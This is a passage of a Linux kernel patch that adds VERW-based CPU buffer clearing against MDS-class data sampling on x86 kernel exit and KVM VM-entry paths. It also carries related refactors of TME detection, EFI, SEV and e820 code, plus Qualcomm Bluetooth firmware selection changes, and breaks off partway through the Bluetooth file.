+index e309e71560389..ee5def1060c86 100644
+--- a/arch/x86/entry/entry_32.S
++++ b/arch/x86/entry/entry_32.S
+@@ -912,6 +912,7 @@ SYM_FUNC_START(entry_SYSENTER_32)
+ 	BUG_IF_WRONG_CR3 no_user_check=1
+ 	popfl
+ 	popl	%eax
++	CLEAR_CPU_BUFFERS
+ 
+ 	/*
+ 	 * Return back to the vDSO, which will pop ecx and edx.
+@@ -981,6 +982,7 @@ restore_all_switch_stack:
+ 
+ 	/* Restore user state */
+ 	RESTORE_REGS pop=4			# skip orig_eax/error_code
++	CLEAR_CPU_BUFFERS
+ .Lirq_return:
+ 	/*
+ 	 * ARCH_HAS_MEMBARRIER_SYNC_CORE rely on IRET core serialization
+@@ -1173,6 +1175,7 @@ SYM_CODE_START(asm_exc_nmi)
+ 
+ 	/* Not on SYSENTER stack. */
+ 	call	exc_nmi
++	CLEAR_CPU_BUFFERS
+ 	jmp	.Lnmi_return
+ 
+ .Lnmi_from_sysenter_stack:
+diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
+index 9953d966d1244..c2383c2880ec6 100644
+--- a/arch/x86/entry/entry_64.S
++++ b/arch/x86/entry/entry_64.S
+@@ -223,6 +223,7 @@ syscall_return_via_sysret:
+ SYM_INNER_LABEL(entry_SYSRETQ_unsafe_stack, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+ 	swapgs
++	CLEAR_CPU_BUFFERS
+ 	sysretq
+ SYM_INNER_LABEL(entry_SYSRETQ_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+@@ -656,6 +657,7 @@ SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
+ 	/* Restore RDI. */
+ 	popq	%rdi
+ 	swapgs
++	CLEAR_CPU_BUFFERS
+ 	jmp	.Lnative_iret
+ 
+ 
+@@ -767,6 +769,8 @@ native_irq_return_ldt:
+ 	 */
+ 	popq	%rax				/* Restore user RAX */
+ 
++	CLEAR_CPU_BUFFERS
++
+ 	/*
+ 	 * RSP now points to an ordinary IRET frame, except that the page
+ 	 * is read-only and RSP[31:16] are preloaded with the userspace
+@@ -1493,6 +1497,12 @@ nmi_restore:
+ 	std
+ 	movq	$0, 5*8(%rsp)		/* clear "NMI executing" */
+ 
++	/*
++	 * Skip CLEAR_CPU_BUFFERS here, since it only helps in rare cases like
++	 * NMI in kernel after user state is restored. For an unprivileged user
++	 * these conditions are hard to meet.
++	 */
++
+ 	/*
+ 	 * iretq reads the "iret" frame and exits the NMI stack in a
+ 	 * single instruction.  We are returning to kernel mode, so this
+@@ -1511,6 +1521,7 @@ SYM_CODE_START(ignore_sysret)
+ 	UNWIND_HINT_EMPTY
+ 	ENDBR
+ 	mov	$-ENOSYS, %eax
++	CLEAR_CPU_BUFFERS
+ 	sysretl
+ SYM_CODE_END(ignore_sysret)
+ #endif
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index d6c08d8986b17..4bcd009a232bf 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -272,6 +272,7 @@ SYM_INNER_LABEL(entry_SYSRETL_compat_unsafe_stack, SYM_L_GLOBAL)
+ 	xorl	%r9d, %r9d
+ 	xorl	%r10d, %r10d
+ 	swapgs
++	CLEAR_CPU_BUFFERS
+ 	sysretl
+ SYM_INNER_LABEL(entry_SYSRETL_compat_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+diff --git a/arch/x86/include/asm/boot.h b/arch/x86/include/asm/boot.h
+index 215d37f7dde8a..a38cc0afc90a0 100644
+--- a/arch/x86/include/asm/boot.h
++++ b/arch/x86/include/asm/boot.h
+@@ -79,4 +79,14 @@
+ # define BOOT_STACK_SIZE	0x1000
+ #endif
+ 
++#ifndef __ASSEMBLY__
++extern unsigned int output_len;
++extern const unsigned long kernel_total_size;
++
++unsigned long decompress_kernel(unsigned char *outbuf, unsigned long virt_addr,
++				void (*error)(char *x));
++
++extern struct boot_params *boot_params_ptr;
++#endif
++
+ #endif /* _ASM_X86_BOOT_H */
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b122708792c4d..b60f24b30cb90 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -304,7 +304,7 @@
+ #define X86_FEATURE_UNRET		(11*32+15) /* "" AMD BTB untrain return */
+ #define X86_FEATURE_USE_IBPB_FW		(11*32+16) /* "" Use IBPB during runtime firmware calls */
+ #define X86_FEATURE_RSB_VMEXIT_LITE	(11*32+17) /* "" Fill RSB on VM exit when EIBRS is enabled */
+-
++#define X86_FEATURE_CLEAR_CPU_BUF	(11*32+18) /* "" Clear CPU buffers using VERW */
+ 
+ #define X86_FEATURE_MSR_TSX_CTRL	(11*32+20) /* "" MSR IA32_TSX_CTRL (Intel) implemented */
+ 
+diff --git a/arch/x86/include/asm/efi.h b/arch/x86/include/asm/efi.h
+index 233ae6986d6f2..e601264b1a243 100644
+--- a/arch/x86/include/asm/efi.h
++++ b/arch/x86/include/asm/efi.h
+@@ -88,6 +88,8 @@ static inline void efi_fpu_end(void)
+ }
+ 
+ #ifdef CONFIG_X86_32
++#define EFI_X86_KERNEL_ALLOC_LIMIT		(SZ_512M - 1)
++
+ #define arch_efi_call_virt_setup()					\
+ ({									\
+ 	efi_fpu_begin();						\
+@@ -101,8 +103,7 @@ static inline void efi_fpu_end(void)
+ })
+ 
+ #else /* !CONFIG_X86_32 */
+-
+-#define EFI_LOADER_SIGNATURE	"EL64"
++#define EFI_X86_KERNEL_ALLOC_LIMIT		EFI_ALLOC_LIMIT
+ 
+ extern asmlinkage u64 __efi_call(void *fp, ...);
+ 
+@@ -214,6 +215,8 @@ efi_status_t efi_set_virtual_address_map(unsigned long memory_map_size,
+ 
+ #ifdef CONFIG_EFI_MIXED
+ 
++#define EFI_ALLOC_LIMIT		(efi_is_64bit() ? ULONG_MAX : U32_MAX)
++
+ #define ARCH_HAS_EFISTUB_WRAPPERS
+ 
+ static inline bool efi_is_64bit(void)
+@@ -325,6 +328,13 @@ static inline u32 efi64_convert_status(efi_status_t status)
+ #define __efi64_argmap_set_memory_space_attributes(phys, size, flags) \
+ 	(__efi64_split(phys), __efi64_split(size), __efi64_split(flags))
+ 
++/* Memory Attribute Protocol */
++#define __efi64_argmap_set_memory_attributes(protocol, phys, size, flags) \
++	((protocol), __efi64_split(phys), __efi64_split(size), __efi64_split(flags))
++
++#define __efi64_argmap_clear_memory_attributes(protocol, phys, size, flags) \
++	((protocol), __efi64_split(phys), __efi64_split(size), __efi64_split(flags))
++
+ /*
+  * The macros below handle the plumbing for the argument mapping. To add a
+  * mapping for a specific EFI method, simply define a macro
+diff --git a/arch/x86/include/asm/entry-common.h b/arch/x86/include/asm/entry-common.h
+index 11203a9fe0a87..ffe72790ceafd 100644
+--- a/arch/x86/include/asm/entry-common.h
++++ b/arch/x86/include/asm/entry-common.h
+@@ -91,7 +91,6 @@ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ 
+ static __always_inline void arch_exit_to_user_mode(void)
+ {
+-	mds_user_clear_cpu_buffers();
+ 	amd_clear_divider();
+ }
+ #define arch_exit_to_user_mode arch_exit_to_user_mode
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index d3706de91a934..8f6f17a8617b6 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -194,6 +194,19 @@
+ #endif
+ .endm
+ 
++/*
++ * Macro to execute VERW instruction that mitigate transient data sampling
++ * attacks such as MDS. On affected systems a microcode update overloaded VERW
++ * instruction to also clear the CPU buffers. VERW clobbers CFLAGS.ZF.
++ *
++ * Note: Only the memory operand variant of VERW clears the CPU buffers.
++ */
++.macro CLEAR_CPU_BUFFERS
++	ALTERNATIVE "jmp .Lskip_verw_\@", "", X86_FEATURE_CLEAR_CPU_BUF
++	verw _ASM_RIP(mds_verw_sel)
++.Lskip_verw_\@:
++.endm
++
+ #else /* __ASSEMBLY__ */
+ 
+ #define ANNOTATE_RETPOLINE_SAFE					\
+@@ -368,13 +381,14 @@ DECLARE_STATIC_KEY_FALSE(switch_to_cond_stibp);
+ DECLARE_STATIC_KEY_FALSE(switch_mm_cond_ibpb);
+ DECLARE_STATIC_KEY_FALSE(switch_mm_always_ibpb);
+ 
+-DECLARE_STATIC_KEY_FALSE(mds_user_clear);
+ DECLARE_STATIC_KEY_FALSE(mds_idle_clear);
+ 
+ DECLARE_STATIC_KEY_FALSE(switch_mm_cond_l1d_flush);
+ 
+ DECLARE_STATIC_KEY_FALSE(mmio_stale_data_clear);
+ 
++extern u16 mds_verw_sel;
++
+ #include <asm/segment.h>
+ 
+ /**
+@@ -400,17 +414,6 @@ static __always_inline void mds_clear_cpu_buffers(void)
+ 	asm volatile("verw %[ds]" : : [ds] "m" (ds) : "cc");
+ }
+ 
+-/**
+- * mds_user_clear_cpu_buffers - Mitigation for MDS and TAA vulnerability
+- *
+- * Clear CPU buffers if the corresponding static key is enabled
+- */
+-static __always_inline void mds_user_clear_cpu_buffers(void)
+-{
+-	if (static_branch_likely(&mds_user_clear))
+-		mds_clear_cpu_buffers();
+-}
+-
+ /**
+  * mds_idle_clear_cpu_buffers - Mitigation for MDS vulnerability
+  *
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index 7ca5c9ec8b52e..cf98fc28601fb 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -157,6 +157,7 @@ static __always_inline void sev_es_nmi_complete(void)
+ 		__sev_es_nmi_complete();
+ }
+ extern int __init sev_es_efi_map_ghcbs(pgd_t *pgd);
++extern void sev_enable(struct boot_params *bp);
+ 
+ static inline int rmpadjust(unsigned long vaddr, bool rmp_psize, unsigned long attrs)
+ {
+@@ -202,12 +203,15 @@ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
+ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
++u64 snp_get_unsupported_features(u64 status);
++u64 sev_get_status(void);
+ #else
+ static inline void sev_es_ist_enter(struct pt_regs *regs) { }
+ static inline void sev_es_ist_exit(void) { }
+ static inline int sev_es_setup_ap_jump_table(struct real_mode_header *rmh) { return 0; }
+ static inline void sev_es_nmi_complete(void) { }
+ static inline int sev_es_efi_map_ghcbs(pgd_t *pgd) { return 0; }
++static inline void sev_enable(struct boot_params *bp) { }
+ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate) { return 0; }
+ static inline int rmpadjust(unsigned long vaddr, bool rmp_psize, unsigned long attrs) { return 0; }
+ static inline void setup_ghcb(void) { }
+@@ -225,6 +229,9 @@ static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *in
+ {
+ 	return -ENOTTY;
+ }
++
++static inline u64 snp_get_unsupported_features(u64 status) { return 0; }
++static inline u64 sev_get_status(void) { return 0; }
+ #endif
+ 
+ #endif
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 13dffc43ded02..d1895930e6eb8 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -110,9 +110,6 @@ DEFINE_STATIC_KEY_FALSE(switch_mm_cond_ibpb);
+ /* Control unconditional IBPB in switch_mm() */
+ DEFINE_STATIC_KEY_FALSE(switch_mm_always_ibpb);
+ 
+-/* Control MDS CPU buffer clear before returning to user space */
+-DEFINE_STATIC_KEY_FALSE(mds_user_clear);
+-EXPORT_SYMBOL_GPL(mds_user_clear);
+ /* Control MDS CPU buffer clear before idling (halt, mwait) */
+ DEFINE_STATIC_KEY_FALSE(mds_idle_clear);
+ EXPORT_SYMBOL_GPL(mds_idle_clear);
+@@ -251,7 +248,7 @@ static void __init mds_select_mitigation(void)
+ 		if (!boot_cpu_has(X86_FEATURE_MD_CLEAR))
+ 			mds_mitigation = MDS_MITIGATION_VMWERV;
+ 
+-		static_branch_enable(&mds_user_clear);
++		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 
+ 		if (!boot_cpu_has(X86_BUG_MSBDS_ONLY) &&
+ 		    (mds_nosmt || cpu_mitigations_auto_nosmt()))
+@@ -355,7 +352,7 @@ static void __init taa_select_mitigation(void)
+ 	 * For guests that can't determine whether the correct microcode is
+ 	 * present on host, enable the mitigation for UCODE_NEEDED as well.
+ 	 */
+-	static_branch_enable(&mds_user_clear);
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 
+ 	if (taa_nosmt || cpu_mitigations_auto_nosmt())
+ 		cpu_smt_disable(false);
+@@ -423,7 +420,7 @@ static void __init mmio_select_mitigation(void)
+ 	 */
+ 	if (boot_cpu_has_bug(X86_BUG_MDS) || (boot_cpu_has_bug(X86_BUG_TAA) &&
+ 					      boot_cpu_has(X86_FEATURE_RTM)))
+-		static_branch_enable(&mds_user_clear);
++		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 	else
+ 		static_branch_enable(&mmio_stale_data_clear);
+ 
+@@ -483,12 +480,12 @@ static void __init md_clear_update_mitigation(void)
+ 	if (cpu_mitigations_off())
+ 		return;
+ 
+-	if (!static_key_enabled(&mds_user_clear))
++	if (!boot_cpu_has(X86_FEATURE_CLEAR_CPU_BUF))
+ 		goto out;
+ 
+ 	/*
+-	 * mds_user_clear is now enabled. Update MDS, TAA and MMIO Stale Data
+-	 * mitigation, if necessary.
++	 * X86_FEATURE_CLEAR_CPU_BUF is now enabled. Update MDS, TAA and MMIO
++	 * Stale Data mitigation, if necessary.
+ 	 */
+ 	if (mds_mitigation == MDS_MITIGATION_OFF &&
+ 	    boot_cpu_has_bug(X86_BUG_MDS)) {
+diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
+index 4278996504833..32bd640170475 100644
+--- a/arch/x86/kernel/cpu/intel.c
++++ b/arch/x86/kernel/cpu/intel.c
+@@ -216,6 +216,90 @@ int intel_cpu_collect_info(struct ucode_cpu_info *uci)
+ }
+ EXPORT_SYMBOL_GPL(intel_cpu_collect_info);
+ 
++#define MSR_IA32_TME_ACTIVATE		0x982
++
++/* Helpers to access TME_ACTIVATE MSR */
++#define TME_ACTIVATE_LOCKED(x)		(x & 0x1)
++#define TME_ACTIVATE_ENABLED(x)		(x & 0x2)
++
++#define TME_ACTIVATE_POLICY(x)		((x >> 4) & 0xf)	/* Bits 7:4 */
++#define TME_ACTIVATE_POLICY_AES_XTS_128	0
++
++#define TME_ACTIVATE_KEYID_BITS(x)	((x >> 32) & 0xf)	/* Bits 35:32 */
++
++#define TME_ACTIVATE_CRYPTO_ALGS(x)	((x >> 48) & 0xffff)	/* Bits 63:48 */
++#define TME_ACTIVATE_CRYPTO_AES_XTS_128	1
++
++/* Values for mktme_status (SW only construct) */
++#define MKTME_ENABLED			0
++#define MKTME_DISABLED			1
++#define MKTME_UNINITIALIZED		2
++static int mktme_status = MKTME_UNINITIALIZED;
++
++static void detect_tme_early(struct cpuinfo_x86 *c)
++{
++	u64 tme_activate, tme_policy, tme_crypto_algs;
++	int keyid_bits = 0, nr_keyids = 0;
++	static u64 tme_activate_cpu0 = 0;
++
++	rdmsrl(MSR_IA32_TME_ACTIVATE, tme_activate);
++
++	if (mktme_status != MKTME_UNINITIALIZED) {
++		if (tme_activate != tme_activate_cpu0) {
++			/* Broken BIOS? */
++			pr_err_once("x86/tme: configuration is inconsistent between CPUs\n");
++			pr_err_once("x86/tme: MKTME is not usable\n");
++			mktme_status = MKTME_DISABLED;
++
++			/* Proceed. We may need to exclude bits from x86_phys_bits. */
++		}
++	} else {
++		tme_activate_cpu0 = tme_activate;
++	}
++
++	if (!TME_ACTIVATE_LOCKED(tme_activate) || !TME_ACTIVATE_ENABLED(tme_activate)) {
++		pr_info_once("x86/tme: not enabled by BIOS\n");
++		mktme_status = MKTME_DISABLED;
++		return;
++	}
++
++	if (mktme_status != MKTME_UNINITIALIZED)
++		goto detect_keyid_bits;
++
++	pr_info("x86/tme: enabled by BIOS\n");
++
++	tme_policy = TME_ACTIVATE_POLICY(tme_activate);
++	if (tme_policy != TME_ACTIVATE_POLICY_AES_XTS_128)
++		pr_warn("x86/tme: Unknown policy is active: %#llx\n", tme_policy);
++
++	tme_crypto_algs = TME_ACTIVATE_CRYPTO_ALGS(tme_activate);
++	if (!(tme_crypto_algs & TME_ACTIVATE_CRYPTO_AES_XTS_128)) {
++		pr_err("x86/mktme: No known encryption algorithm is supported: %#llx\n",
++				tme_crypto_algs);
++		mktme_status = MKTME_DISABLED;
++	}
++detect_keyid_bits:
++	keyid_bits = TME_ACTIVATE_KEYID_BITS(tme_activate);
++	nr_keyids = (1UL << keyid_bits) - 1;
++	if (nr_keyids) {
++		pr_info_once("x86/mktme: enabled by BIOS\n");
++		pr_info_once("x86/mktme: %d KeyIDs available\n", nr_keyids);
++	} else {
++		pr_info_once("x86/mktme: disabled by BIOS\n");
++	}
++
++	if (mktme_status == MKTME_UNINITIALIZED) {
++		/* MKTME is usable */
++		mktme_status = MKTME_ENABLED;
++	}
++
++	/*
++	 * KeyID bits effectively lower the number of physical address
++	 * bits.  Update cpuinfo_x86::x86_phys_bits accordingly.
++	 */
++	c->x86_phys_bits -= keyid_bits;
++}
++
+ static void early_init_intel(struct cpuinfo_x86 *c)
+ {
+ 	u64 misc_enable;
+@@ -367,6 +451,13 @@ static void early_init_intel(struct cpuinfo_x86 *c)
+ 	 */
+ 	if (detect_extended_topology_early(c) < 0)
+ 		detect_ht_early(c);
++
++	/*
++	 * Adjust the number of physical bits early because it affects the
++	 * valid bits of the MTRR mask registers.
++	 */
++	if (cpu_has(c, X86_FEATURE_TME))
++		detect_tme_early(c);
+ }
+ 
+ static void bsp_init_intel(struct cpuinfo_x86 *c)
+@@ -527,90 +618,6 @@ static void srat_detect_node(struct cpuinfo_x86 *c)
+ #endif
+ }
+ 
+-#define MSR_IA32_TME_ACTIVATE		0x982
+-
+-/* Helpers to access TME_ACTIVATE MSR */
+-#define TME_ACTIVATE_LOCKED(x)		(x & 0x1)
+-#define TME_ACTIVATE_ENABLED(x)		(x & 0x2)
+-
+-#define TME_ACTIVATE_POLICY(x)		((x >> 4) & 0xf)	/* Bits 7:4 */
+-#define TME_ACTIVATE_POLICY_AES_XTS_128	0
+-
+-#define TME_ACTIVATE_KEYID_BITS(x)	((x >> 32) & 0xf)	/* Bits 35:32 */
+-
+-#define TME_ACTIVATE_CRYPTO_ALGS(x)	((x >> 48) & 0xffff)	/* Bits 63:48 */
+-#define TME_ACTIVATE_CRYPTO_AES_XTS_128	1
+-
+-/* Values for mktme_status (SW only construct) */
+-#define MKTME_ENABLED			0
+-#define MKTME_DISABLED			1
+-#define MKTME_UNINITIALIZED		2
+-static int mktme_status = MKTME_UNINITIALIZED;
+-
+-static void detect_tme(struct cpuinfo_x86 *c)
+-{
+-	u64 tme_activate, tme_policy, tme_crypto_algs;
+-	int keyid_bits = 0, nr_keyids = 0;
+-	static u64 tme_activate_cpu0 = 0;
+-
+-	rdmsrl(MSR_IA32_TME_ACTIVATE, tme_activate);
+-
+-	if (mktme_status != MKTME_UNINITIALIZED) {
+-		if (tme_activate != tme_activate_cpu0) {
+-			/* Broken BIOS? */
+-			pr_err_once("x86/tme: configuration is inconsistent between CPUs\n");
+-			pr_err_once("x86/tme: MKTME is not usable\n");
+-			mktme_status = MKTME_DISABLED;
+-
+-			/* Proceed. We may need to exclude bits from x86_phys_bits. */
+-		}
+-	} else {
+-		tme_activate_cpu0 = tme_activate;
+-	}
+-
+-	if (!TME_ACTIVATE_LOCKED(tme_activate) || !TME_ACTIVATE_ENABLED(tme_activate)) {
+-		pr_info_once("x86/tme: not enabled by BIOS\n");
+-		mktme_status = MKTME_DISABLED;
+-		return;
+-	}
+-
+-	if (mktme_status != MKTME_UNINITIALIZED)
+-		goto detect_keyid_bits;
+-
+-	pr_info("x86/tme: enabled by BIOS\n");
+-
+-	tme_policy = TME_ACTIVATE_POLICY(tme_activate);
+-	if (tme_policy != TME_ACTIVATE_POLICY_AES_XTS_128)
+-		pr_warn("x86/tme: Unknown policy is active: %#llx\n", tme_policy);
+-
+-	tme_crypto_algs = TME_ACTIVATE_CRYPTO_ALGS(tme_activate);
+-	if (!(tme_crypto_algs & TME_ACTIVATE_CRYPTO_AES_XTS_128)) {
+-		pr_err("x86/mktme: No known encryption algorithm is supported: %#llx\n",
+-				tme_crypto_algs);
+-		mktme_status = MKTME_DISABLED;
+-	}
+-detect_keyid_bits:
+-	keyid_bits = TME_ACTIVATE_KEYID_BITS(tme_activate);
+-	nr_keyids = (1UL << keyid_bits) - 1;
+-	if (nr_keyids) {
+-		pr_info_once("x86/mktme: enabled by BIOS\n");
+-		pr_info_once("x86/mktme: %d KeyIDs available\n", nr_keyids);
+-	} else {
+-		pr_info_once("x86/mktme: disabled by BIOS\n");
+-	}
+-
+-	if (mktme_status == MKTME_UNINITIALIZED) {
+-		/* MKTME is usable */
+-		mktme_status = MKTME_ENABLED;
+-	}
+-
+-	/*
+-	 * KeyID bits effectively lower the number of physical address
+-	 * bits.  Update cpuinfo_x86::x86_phys_bits accordingly.
+-	 */
+-	c->x86_phys_bits -= keyid_bits;
+-}
+-
+ static void init_cpuid_fault(struct cpuinfo_x86 *c)
+ {
+ 	u64 msr;
+@@ -747,9 +754,6 @@ static void init_intel(struct cpuinfo_x86 *c)
+ 
+ 	init_ia32_feat_ctl(c);
+ 
+-	if (cpu_has(c, X86_FEATURE_TME))
+-		detect_tme(c);
+-
+ 	init_intel_misc_features(c);
+ 
+ 	split_lock_init();
+diff --git a/arch/x86/kernel/e820.c b/arch/x86/kernel/e820.c
+index 9dac24680ff8e..993734e96615a 100644
+--- a/arch/x86/kernel/e820.c
++++ b/arch/x86/kernel/e820.c
+@@ -1017,10 +1017,12 @@ void __init e820__reserve_setup_data(void)
+ 		e820__range_update(pa_data, sizeof(*data)+data->len, E820_TYPE_RAM, E820_TYPE_RESERVED_KERN);
+ 
+ 		/*
+-		 * SETUP_EFI and SETUP_IMA are supplied by kexec and do not need
+-		 * to be reserved.
++		 * SETUP_EFI, SETUP_IMA and SETUP_RNG_SEED are supplied by
++		 * kexec and do not need to be reserved.
+ 		 */
+-		if (data->type != SETUP_EFI && data->type != SETUP_IMA)
++		if (data->type != SETUP_EFI &&
++		    data->type != SETUP_IMA &&
++		    data->type != SETUP_RNG_SEED)
+ 			e820__range_update_kexec(pa_data,
+ 						 sizeof(*data) + data->len,
+ 						 E820_TYPE_RAM, E820_TYPE_RESERVED_KERN);
+diff --git a/arch/x86/kernel/nmi.c b/arch/x86/kernel/nmi.c
+index cec0bfa3bc04f..ed6cce6c39504 100644
+--- a/arch/x86/kernel/nmi.c
++++ b/arch/x86/kernel/nmi.c
+@@ -522,9 +522,6 @@ DEFINE_IDTENTRY_RAW(exc_nmi)
+ 		write_cr2(this_cpu_read(nmi_cr2));
+ 	if (this_cpu_dec_return(nmi_state))
+ 		goto nmi_restart;
+-
+-	if (user_mode(regs))
+-		mds_user_clear_cpu_buffers();
+ }
+ 
+ #if defined(CONFIG_X86_64) && IS_ENABLED(CONFIG_KVM_INTEL)
+diff --git a/arch/x86/kvm/vmx/run_flags.h b/arch/x86/kvm/vmx/run_flags.h
+index edc3f16cc1896..6a9bfdfbb6e59 100644
+--- a/arch/x86/kvm/vmx/run_flags.h
++++ b/arch/x86/kvm/vmx/run_flags.h
+@@ -2,7 +2,10 @@
+ #ifndef __KVM_X86_VMX_RUN_FLAGS_H
+ #define __KVM_X86_VMX_RUN_FLAGS_H
+ 
+-#define VMX_RUN_VMRESUME	(1 << 0)
+-#define VMX_RUN_SAVE_SPEC_CTRL	(1 << 1)
++#define VMX_RUN_VMRESUME_SHIFT		0
++#define VMX_RUN_SAVE_SPEC_CTRL_SHIFT	1
++
++#define VMX_RUN_VMRESUME		BIT(VMX_RUN_VMRESUME_SHIFT)
++#define VMX_RUN_SAVE_SPEC_CTRL		BIT(VMX_RUN_SAVE_SPEC_CTRL_SHIFT)
+ 
+ #endif /* __KVM_X86_VMX_RUN_FLAGS_H */
+diff --git a/arch/x86/kvm/vmx/vmenter.S b/arch/x86/kvm/vmx/vmenter.S
+index 0b5db4de4d09e..0b2cad66dee12 100644
+--- a/arch/x86/kvm/vmx/vmenter.S
++++ b/arch/x86/kvm/vmx/vmenter.S
+@@ -106,7 +106,7 @@ SYM_FUNC_START(__vmx_vcpu_run)
+ 	mov (%_ASM_SP), %_ASM_AX
+ 
+ 	/* Check if vmlaunch or vmresume is needed */
+-	testb $VMX_RUN_VMRESUME, %bl
++	bt   $VMX_RUN_VMRESUME_SHIFT, %bx
+ 
+ 	/* Load guest registers.  Don't clobber flags. */
+ 	mov VCPU_RCX(%_ASM_AX), %_ASM_CX
+@@ -128,8 +128,11 @@ SYM_FUNC_START(__vmx_vcpu_run)
+ 	/* Load guest RAX.  This kills the @regs pointer! */
+ 	mov VCPU_RAX(%_ASM_AX), %_ASM_AX
+ 
+-	/* Check EFLAGS.ZF from 'testb' above */
+-	jz .Lvmlaunch
++	/* Clobbers EFLAGS.ZF */
++	CLEAR_CPU_BUFFERS
++
++	/* Check EFLAGS.CF from the VMX_RUN_VMRESUME bit test above. */
++	jnc .Lvmlaunch
+ 
+ 	/*
+ 	 * After a successful VMRESUME/VMLAUNCH, control flow "magically"
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 57c1374fdfd49..5c1590855ffcd 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -407,7 +407,8 @@ static __always_inline void vmx_enable_fb_clear(struct vcpu_vmx *vmx)
+ 
+ static void vmx_update_fb_clear_dis(struct kvm_vcpu *vcpu, struct vcpu_vmx *vmx)
+ {
+-	vmx->disable_fb_clear = vmx_fb_clear_ctrl_available;
++	vmx->disable_fb_clear = !cpu_feature_enabled(X86_FEATURE_CLEAR_CPU_BUF) &&
++		vmx_fb_clear_ctrl_available;
+ 
+ 	/*
+ 	 * If guest will not execute VERW, there is no need to set FB_CLEAR_DIS
+@@ -7120,11 +7121,14 @@ static noinstr void vmx_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+ {
+ 	guest_state_enter_irqoff();
+ 
+-	/* L1D Flush includes CPU buffer clear to mitigate MDS */
++	/*
++	 * L1D Flush includes CPU buffer clear to mitigate MDS, but VERW
++	 * mitigation for MDS is done late in VMentry and is still
++	 * executed in spite of L1D Flush. This is because an extra VERW
++	 * should not matter much after the big hammer L1D Flush.
++	 */
+ 	if (static_branch_unlikely(&vmx_l1d_should_flush))
+ 		vmx_l1d_flush(vcpu);
+-	else if (static_branch_unlikely(&mds_user_clear))
+-		mds_clear_cpu_buffers();
+ 	else if (static_branch_unlikely(&mmio_stale_data_clear) &&
+ 		 kvm_arch_has_assigned_device(vcpu->kvm))
+ 		mds_clear_cpu_buffers();
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index c9064d34d8308..0211f704a358b 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -152,7 +152,7 @@ static int qca_send_patch_config_cmd(struct hci_dev *hdev)
+ 	bt_dev_dbg(hdev, "QCA Patch config");
+ 
+ 	skb = __hci_cmd_sync_ev(hdev, EDL_PATCH_CMD_OPCODE, sizeof(cmd),
+-				cmd, HCI_EV_VENDOR, HCI_INIT_TIMEOUT);
++				cmd, 0, HCI_INIT_TIMEOUT);
+ 	if (IS_ERR(skb)) {
+ 		err = PTR_ERR(skb);
+ 		bt_dev_err(hdev, "Sending QCA Patch config failed (%d)", err);
+@@ -594,27 +594,48 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 	/* Firmware files to download are based on ROM version.
+ 	 * ROM version is derived from last two bytes of soc_ver.
+ 	 */
+-	rom_ver = ((soc_ver & 0x00000f00) >> 0x04) | (soc_ver & 0x0000000f);
++	if (soc_type == QCA_WCN3988)
++		rom_ver = ((soc_ver & 0x00000f00) >> 0x05) | (soc_ver & 0x0000000f);
++	else
++		rom_ver = ((soc_ver & 0x00000f00) >> 0x04) | (soc_ver & 0x0000000f);
+ 
+ 	if (soc_type == QCA_WCN6750)
+ 		qca_send_patch_config_cmd(hdev);
+ 
+ 	/* Download rampatch file */
+ 	config.type = TLV_TYPE_PATCH;
+-	if (qca_is_wcn399x(soc_type)) {
++	switch (soc_type) {
++	case QCA_WCN3990:
++	case QCA_WCN3991:
++	case QCA_WCN3998:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/crbtfw%02x.tlv", rom_ver);
+-	} else if (soc_type == QCA_QCA6390) {
++		break;
++	case QCA_WCN3988:
++		snprintf(config.fwname, sizeof(config.fwname),
++			 "qca/apbtfw%02x.tlv", rom_ver);
++		break;
++	case QCA_QCA6390:
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/htbtfw%02x.tlv", rom_ver);
+-	} else if (soc_type == QCA_WCN6750) {
++		break;
++	case QCA_WCN6750:
+ 		/* Choose mbn file by default.If mbn file is not found
+ 		 * then choose tlv file
+ 		 */
+ 		config.type = ELF_TYPE_PATCH;
+ 		snprintf(config.fwname, sizeof(config.fwname),
+ 			 "qca/msbtfw%02x.mbn", rom_ver);
+-	} else {
++		break;
++	case QCA_WCN6855:
